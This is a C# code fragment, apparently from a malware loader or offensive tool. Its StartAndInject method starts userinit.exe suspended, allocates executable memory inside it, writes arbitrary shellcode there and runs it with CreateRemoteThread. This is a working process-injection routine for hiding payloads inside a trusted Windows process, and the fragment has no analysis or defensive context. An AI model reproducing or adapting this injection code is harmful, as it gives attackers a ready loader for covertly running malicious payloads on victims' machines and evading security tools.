public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, Structs.SecurityAttributes lpProcessAttributes, Structs.SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, Structs.CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
String lpCurrentDirectory,
[In] Structs.StartupInfo lpStartupInfo,
out Structs.ProcessInformation lpProcessInformation
);
public static void StartAndInject(byte[] shellcode)
{
string binary = "userinit.exe";
Int32 size = shellcode.Length;
Structs.StartupInfo sInfo = new Structs.StartupInfo();
sInfo.dwFlags = 0;
Structs.ProcessInformation pInfo;
string binaryPath = "C:\\Windows\\System32\\" + binary;
IntPtr funcAddr = WinAPI.CreateProcessA(binaryPath, null, null, null, true, Structs.CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
IntPtr hProcess = pInfo.hProcess;
IntPtr spaceAddr = WinAPI.VirtualAllocEx(hProcess, new IntPtr(0), (uint)size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
UIntPtr bytesWritten;
IntPtr size2 = new IntPtr(shellcode.Length);
bool bWrite = WinAPI.WriteProcessMemory(hProcess, spaceAddr, shellcode, (uint)size2, out bytesWritten);
WinAPI.CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
}
